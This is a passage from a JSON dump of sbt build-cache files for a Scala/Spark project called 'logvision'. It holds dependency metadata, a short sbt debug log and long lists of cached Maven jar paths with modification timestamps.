    "content": "{\"{\\\"organization\\\":\\\"org.scala-lang\\\",\\\"name\\\":\\\"scala-library\\\",\\\"revision\\\":\\\"2.12.10\\\",\\\"configurations\\\":\\\"provided\\\",\\\"isChanging\\\":false,\\\"isTransitive\\\":true,\\\"isForce\\\":false,\\\"explicitArtifacts\\\":[],\\\"inclusions\\\":[],\\\"exclusions\\\":[],\\\"extraAttributes\\\":{},\\\"crossVersion\\\":{\\\"type\\\":\\\"Disabled\\\"}}\":{\"value\":{\"$fields\":[\"path\",\"startLine\"],\"path\":\"(sbt.Classpaths.jvmBaseSettings) Defaults.scala\",\"startLine\":2528},\"type\":\"LinePosition\"},\"{\\\"organization\\\":\\\"com.eed3si9n\\\",\\\"name\\\":\\\"sbt-assembly\\\",\\\"revision\\\":\\\"0.14.10\\\",\\\"isChanging\\\":false,\\\"isTransitive\\\":true,\\\"isForce\\\":false,\\\"explicitArtifacts\\\":[],\\\"inclusions\\\":[],\\\"exclusions\\\":[],\\\"extraAttributes\\\":{\\\"e:sbtVersion\\\":\\\"1.0\\\",\\\"e:scalaVersion\\\":\\\"2.12\\\"},\\\"crossVersion\\\":{\\\"type\\\":\\\"Disabled\\\"}}\":{\"value\":{\"$fields\":[\"path\",\"range\"],\"path\":\"/Users/xander/Desktop/logvision/spark/project/assembly.sbt\",\"range\":{\"$fields\":[\"start\",\"end\"],\"start\":1,\"end\":2}},\"type\":\"RangePosition\"}}"
  },
  {
    "path": "spark/project/target/streams/_global/ivyConfiguration/_global/streams/out",
    "content": ""
  },
  {
    "path": "spark/project/target/streams/_global/ivySbt/_global/streams/out",
    "content": ""
  },
  {
    "path": "spark/project/target/streams/_global/moduleSettings/_global/streams/out",
    "content": ""
  },
  {
    "path": "spark/project/target/streams/_global/projectDescriptors/_global/streams/out",
    "content": ""
  },
  {
    "path": "spark/project/target/streams/_global/scalaCompilerBridgeScope/_global/streams/out",
    "content": ""
  },
  {
    "path": "spark/project/target/streams/_global/update/_global/streams/out",
    "content": "\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0m\"not up to date. inChanged = true, force = false\u001b[0m\n\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mUpdating ProjectRef(uri(\"file:/Users/xander/Desktop/logvision/spark/project/\"), \"spark-build\")...\u001b[0m\n\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mDone updating ProjectRef(uri(\"file:/Users/xander/Desktop/logvision/spark/project/\"), \"spark-build\")\u001b[0m\n"
  },
  {
    "path": "spark/project/target/streams/compile/_global/_global/compileBinaryFileInputs/previous",
    "content": "[\"sbt.Task[scala.collection.immutable.Map[java.lang.String, scala.collection.Seq[scala.Tuple2[java.nio.file.Path, sbt.nio.FileStamp]]]]\",{\"2.12.10\":{\"hashes\":[],\"lastModifiedTimes\":[[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/test-interface/1.0/test-interface-1.0.jar\",1372459476000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/typesafe/ssl-config-core_2.12/0.4.0/ssl-config-core_2.12-0.4.0.jar\",1556196605000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/io_2.12/1.3.3/io_2.12-1.3.3.jar\",1580106979000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/main_2.12/1.3.8/main_2.12-1.3.8.jar\",1580761934000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/trueaccord/lenses/lenses_2.12/0.4.12/lenses_2.12-0.4.12.jar\",1496557872000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\",1428064266000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/command_2.12/1.3.8/command_2.12-1.3.8.jar\",1580761844000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/ben-manes/caffeine/caffeine/2.5.6/caffeine-2.5.6.jar\",1506124453000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/task-system_2.12/1.3.8/task-system_2.12-1.3.8.jar\",1580761881000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/main-settings_2.12/1.3.8/main-settings_2.12-1.3.8.jar\",1580761833000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/gigahorse-core_2.12/0.5.0/gigahorse-core_2.12-0.5.0.jar\",1560903293000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/google/protobuf/protobuf-java/3.7.0/protobuf-java-3.7.0.jar\",1551913597000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/gigahorse-okhttp_2.12/0.5.0/gigahorse-okhttp_2.12-0.5.0.jar\",1560903298000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar\",1447173577000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-scalajson_2.12/0.8.3/sjson-new-scalajson_2.12-0.8.3.jar\",1563056822000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-relation_2.12/1.3.3/util-relation_2.12-1.3.3.jar\",1576119995000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/modules/scala-xml_2.12/1.2.0/scala-xml_2.12-1.2.0.jar\",1554476959000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/spire-math/jawn-parser_2.12/0.10.4/jawn-parser_2.12-0.10.4.jar\",1479009615000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant/1.9.9/ant-1.9.9.jar\",1486060808000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar\",1447173564000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-classpath_2.12/1.3.4/zinc-classpath_2.12-1.3.4.jar\",1580694942000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-core_2.12/1.3.4/zinc-core_2.12-1.3.4.jar\",1580694928000],[\"/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-compiler.jar\",1568150551000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/net/java/dev/jna/jna/4.5.0/jna-4.5.0.jar\",1505334470000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/fastparse-utils_2.12/0.4.2/fastparse-utils_2.12-0.4.2.jar\",1478111016000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lmax/disruptor/3.4.2/disruptor-3.4.2.jar\",1523227268000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar\",1255476900000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/tasks_2.12/1.3.8/tasks_2.12-1.3.8.jar\",1580761875000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/reactivestreams/reactive-streams/1.0.2/reactive-streams-1.0.2.jar\",1513627594000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/slf4j/slf4j-api/1.7.26/slf4j-api-1.7.26.jar\",1550531761000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/swoval/file-tree-views/2.1.3/file-tree-views-2.1.3.jar\",1562617173000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okhttp3/okhttp/3.14.2/okhttp-3.14.2.jar\",1558287483000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/sourcecode_2.12/0.1.3/sourcecode_2.12-0.1.3.jar\",1477938730000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar\",1164239377000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-analysis/7.0/asm-analysis-7.0.jar\",1540647753000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/jcraft/jsch/0.1.54/jsch-0.1.54.jar\",1472895734000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-scripted_2.12/1.3.3/util-scripted_2.12-1.3.3.jar\",1576119985000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar\",1257720259000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar\",1447173543000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-cache_2.12/1.3.3/util-cache_2.12-1.3.3.jar\",1576119990000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-commons/7.0/asm-commons-7.0.jar\",1540647757000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-slf4j-impl/2.11.2/log4j-slf4j-impl-2.11.2.jar\",1549415635000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/net/java/dev/jna/jna-platform/4.5.0/jna-platform-4.5.0.jar\",1505334589000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/jline/jline/2.14.6/jline-2.14.6.jar\",1522055915000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/sbt/1.3.8/sbt-1.3.8.jar\",1580761906000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant-launcher/1.9.9/ant-launcher-1.9.9.jar\",1486061055000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/protocol_2.12/1.3.8/protocol_2.12-1.3.8.jar\",1580761901000],[\"/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-reflect.jar\",1568150359000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/fastparse_2.12/0.4.2/fastparse_2.12-0.4.2.jar\",1478110998000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/modules/scala-parser-combinators_2.12/1.1.2/scala-parser-combinators_2.12-1.1.2.jar\",1554501477000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc_2.12/1.3.4/zinc_2.12-1.3.4.jar\",1580694953000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/cb372/scalacache-caffeine_2.12/0.20.0/scalacache-caffeine_2.12-0.20.0.jar\",1510153827000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/ivy/ivy/2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19/ivy-2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19.jar\",1576244822000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/logic_2.12/1.3.8/logic_2.12-1.3.8.jar\",1580761860000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-tree/7.0/asm-tree-7.0.jar\",1540647764000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/ipcsocket/ipcsocket/1.0.0/ipcsocket-1.0.0.jar\",1515371702000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-persist_2.12/1.3.4/zinc-persist_2.12-1.3.4.jar\",1580694930000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/shaded-scalajson_2.12/1.0.0-M4/shaded-scalajson_2.12-1.0.0-M4.jar\",1499894894000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar\",1442187667000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/collections_2.12/1.3.8/collections_2.12-1.3.8.jar\",1580761821000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar\",1442187924000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/launcher-interface/1.1.3/launcher-interface-1.1.3.jar\",1566946835000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/pantsbuild/jarjar/1.7.2/jarjar-1.7.2.jar\",1540779378000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/trueaccord/scalapb/scalapb-runtime_2.12/0.6.0/scalapb-runtime_2.12-0.6.0.jar\",1498805900000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/compiler-interface/1.3.4/compiler-interface-1.3.4.jar\",1580694955000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar\",1285877698000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-control_2.12/1.3.3/util-control_2.12-1.3.3.jar\",1576119992000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/test-agent/1.3.8/test-agent-1.3.8.jar\",1580761853000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-classfile_2.12/1.3.4/zinc-classfile_2.12-1.3.4.jar\",1580694933000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-apiinfo_2.12/1.3.4/zinc-apiinfo_2.12-1.3.4.jar\",1580694944000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/completion_2.12/1.3.8/completion_2.12-1.3.8.jar\",1580761950000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar\",1409332102000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-compile_2.12/1.3.4/zinc-compile_2.12-1.3.4.jar\",1580694936000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/io/get-coursier/lm-coursier-shaded_2.12/2.0.0-RC5-3/lm-coursier-shaded_2.12-2.0.0-RC5-3.jar\",1578451733000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/core-macros_2.12/1.3.8/core-macros_2.12-1.3.8.jar\",1580761871000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/run_2.12/1.3.8/run_2.12-1.3.8.jar\",1580761911000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/cb372/scalacache-core_2.12/0.20.0/scalacache-core_2.12-0.20.0.jar\",1510153816000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-position_2.12/1.3.3/util-position_2.12-1.3.3.jar\",1576119996000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-core_2.12/0.8.3/sjson-new-core_2.12-0.8.3.jar\",1563056819000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/typesafe/config/1.3.3/config-1.3.3.jar\",1519222085000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/librarymanagement-core_2.12/1.3.1/librarymanagement-core_2.12-1.3.1.jar\",1576205338000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/sbinary_2.12/0.5.0/sbinary_2.12-0.5.0.jar\",1535526772000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okhttp3/okhttp-urlconnection/3.7.0/okhttp-urlconnection-3.7.0.jar\",1492307721000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm/7.0/asm-7.0.jar\",1540647749000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-api/2.11.2/log4j-api-2.11.2.jar\",1549415503000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okio/okio/1.17.2/okio-1.17.2.jar\",1547754336000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-interface/1.3.3/util-interface-1.3.3.jar\",1576119983000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.11.2/log4j-core-2.11.2.jar\",1549415573000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-logging_2.12/1.3.3/util-logging_2.12-1.3.3.jar\",1576119989000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-tracking_2.12/1.3.3/util-tracking_2.12-1.3.3.jar\",1576119981000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-murmurhash_2.12/0.8.3/sjson-new-murmurhash_2.12-0.8.3.jar\",1563056833000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/compiler-bridge_2.12/1.3.4/compiler-bridge_2.12-1.3.4.jar\",1580694950000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/actions_2.12/1.3.8/actions_2.12-1.3.8.jar\",1580761927000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/scripted-sbt-redux_2.12/1.3.8/scripted-sbt-redux_2.12-1.3.8.jar\",1580761830000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scalactic/scalactic_2.12/3.0.8/scalactic_2.12-3.0.8.jar\",1560177704000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar\",1428423025000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-compile-core_2.12/1.3.4/zinc-compile-core_2.12-1.3.4.jar\",1580694948000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/testing_2.12/1.3.8/testing_2.12-1.3.8.jar\",1580761845000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/scripted-plugin_2.12/1.3.8/scripted-plugin_2.12-1.3.8.jar\",1580761922000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo.scala-sbt.org/scalasbt/sbt-plugin-releases/com.eed3si9n/sbt-assembly/scala_2.12/sbt_1.0/0.14.10/jars/sbt-assembly.jar\",1562377986000],[\"/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-library.jar\",1568150453000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/template-resolver/0.1/template-resolver-0.1.jar\",1471834035000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/librarymanagement-ivy_2.12/1.3.1/librarymanagement-ivy_2.12-1.3.1.jar\",1576205342000],[\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-lm-integration_2.12/1.3.8/zinc-lm-integration_2.12-1.3.8.jar\",1580761871000]]}}]"
  },
  {
    "path": "spark/project/target/streams/compile/_global/_global/compileOutputs/previous",
    "content": "[\"sbt.Task[scala.collection.Seq[java.nio.file.Path]]\",[\"/Users/xander/Desktop/logvision/spark/project/target/streams/compile/compileOutputs/_global/streams/inc_compile_2.12.zip\"]]"
  },
  {
    "path": "spark/project/target/streams/compile/_global/_global/compileSourceFileInputs/previous",
    "content": "[\"sbt.Task[scala.collection.immutable.Map[java.lang.String, scala.collection.Seq[scala.Tuple2[java.nio.file.Path, sbt.nio.FileStamp]]]]\",{\"2.12.10\":{\"hashes\":[],\"lastModifiedTimes\":[]}}]"
  },
  {
    "path": "spark/project/target/streams/compile/_global/_global/dependencyClasspathFiles/previous",
    "content": "[\"sbt.Task[scala.collection.Seq[java.nio.file.Path]]\",[\"/Users/xander/.sbt/1.0/plugins/target/scala-2.12/sbt-1.0/classes\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/test-interface/1.0/test-interface-1.0.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/typesafe/ssl-config-core_2.12/0.4.0/ssl-config-core_2.12-0.4.0.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/io_2.12/1.3.3/io_2.12-1.3.3.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/main_2.12/1.3.8/main_2.12-1.3.8.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/trueaccord/lenses/lenses_2.12/0.4.12/lenses_2.12-0.4.12.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/command_2.12/1.3.8/command_2.12-1.3.8.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/ben-manes/caffeine/caffeine/2.5.6/caffeine-2.5.6.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/task-system_2.12/1.3.8/task-system_2.12-1.3.8.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/main-settings_2.12/1.3.8/main-settings_2.12-1.3.8.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/gigahorse-core_2.12/0.5.0/gigahorse-core_2.12-0.5.0.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/google/protobuf/protobuf-java/3.7.0/protobuf-java-3.7.0.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/gigahorse-okhttp_2.12/0.5.0/gigahorse-okhttp_2.12-0.5.0.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-scalajson_2.12/0.8.3/sjson-new-scalajson_2.12-0.8.3.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-relation_2.12/1.3.3/util-relation_2.12-1.3.3.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/modules/scala-xml_2.12/1.2.0/scala-xml_2.12-1.2.0.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/spire-math/jawn-parser_2.12/0.10.4/jawn-parser_2.12-0.10.4.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant/1.9.9/ant-1.9.9.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-classpath_2.12/1.3.4/zinc-classpath_2.12-1.3.4.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-core_2.12/1.3.4/zinc-core_2.12-1.3.4.jar\",\"/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-compiler.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/net/java/dev/jna/jna/4.5.0/jna-4.5.0.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/fastparse-utils_2.12/0.4.2/fastparse-utils_2.12-0.4.2.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lmax/disruptor/3.4.2/disruptor-3.4.2.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/tasks_2.12/1.3.8/tasks_2.12-1.3.8.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/reactivestreams/reactive-streams/1.0.2/reactive-streams-1.0.2.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/slf4j/slf4j-api/1.7.26/slf4j-api-1.7.26.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/swoval/file-tree-views/2.1.3/file-tree-views-2.1.3.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okhttp3/okhttp/3.14.2/okhttp-3.14.2.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/sourcecode_2.12/0.1.3/sourcecode_2.12-0.1.3.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-analysis/7.0/asm-analysis-7.0.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/jcraft/jsch/0.1.54/jsch-0.1.54.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-scripted_2.12/1.3.3/util-scripted_2.12-1.3.3.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-cache_2.12/1.3.3/util-cache_2.12-1.3.3.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-commons/7.0/asm-commons-7.0.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-slf4j-impl/2.11.2/log4j-slf4j-impl-2.11.2.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/net/java/dev/jna/jna-platform/4.5.0/jna-platform-4.5.0.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/jline/jline/2.14.6/jline-2.14.6.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/sbt/1.3.8/sbt-1.3.8.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant-launcher/1.9.9/ant-launcher-1.9.9.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/protocol_2.12/1.3.8/protocol_2.12-1.3.8.jar\",\"/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-reflect.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/fastparse_2.12/0.4.2/fastparse_2.12-0.4.2.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/modules/scala-parser-combinators_2.12/1.1.2/scala-parser-combinators_2.12-1.1.2.jar\",\"/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc_2.12/1.3.4/zinc_2.12-1.3.4.jar\",\"/Users/xander/Library/C